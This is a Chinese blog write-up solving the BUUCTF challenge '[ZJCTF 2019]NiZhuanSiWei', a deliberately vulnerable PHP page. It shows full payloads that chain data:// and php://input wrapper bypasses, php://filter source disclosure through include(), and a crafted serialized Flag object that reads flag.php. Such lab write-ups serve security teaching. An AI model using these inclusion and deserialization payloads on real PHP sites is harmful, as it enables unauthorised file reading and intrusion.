BUUCTF__[ZJCTF 2019]NiZhuanSiWei_题解

前言

  • 又是一天。

读题

  • 打开题目,直接给源码
 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?> 
  • 看到有include文件包含,必然是解题的重点,所以先看第一个if,必须先满足它。

  • text不为空,且 file_get_contents() 读取的返回值为 welcome to the zjctf

  • file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没没有一个文件,而是读取的text变量。没查到相关这方面的用法,特别是那个r参数。

  • 而如果直接给text赋值 text=welcome to the zjctf 的话,没有回显说明没成功。

  • 所以需要用方法绕过它,两种方法

    • php://input伪协议

      • 此协议需要 allow_url_include 为 on ,可以访问请求的原始数据的只读流, 将post请求中的数据作为 PHP代码执行。当传入的参数作为文件名打开时,可以将参数设为 php://input ,同时post想设置的文件内容,php执行时会将post内容当作文件内容。
      • 好像用 HackBar 因为在 post 中没有设置变量不能访问,所以用bp抓包。
      • 看到有回显,可行。
        在这里插入图片描述
    • data://伪协议

      • data://协议需要满足双on条件,作用和 php://input 类似
        在这里插入图片描述

      • 也可以加上 base64 编码。
        在这里插入图片描述

  • 再看第二个if file不能有flag字符。没啥,往下看。

  • 提示了有一个 useless.php ,想到之前说的PHP伪协议中的php://filter读取文件。尝试。

    php://filter/read=convert.base64-encode/resource=useless.php
    
  • 所以构造payload,成功回显。

    ?text=data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php     
    

    在这里插入图片描述

  • base64解码,成功得到 useless.php 源码。

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

  • 看到有一个 flag.php ,并且file不为空将读取flag.php并显示。所以。构造一个序列化字符串。
<?php  

class Flag{  //flag.php  
    public $file=flag.php;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  

$a = new Flag();
$a->file="flag.php";
echo serialize($a);
  • 找个在线运行PHP的网站,得到

      O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
    
  • 最后综合payload

    ?text=data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
    
  • 这里发现如果file继续用前面伪协议读取的话,后面的 password 会无回显无法得到flag 。需修改为 useless.php。

最后

  • 这题就是利用了PHP伪协议来解题,灵活运用。

  • 附上题目链接

  • 持续更新BUUCTF题解,写的不是很好,欢迎指正。

  • 最后欢迎来访个人博客

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值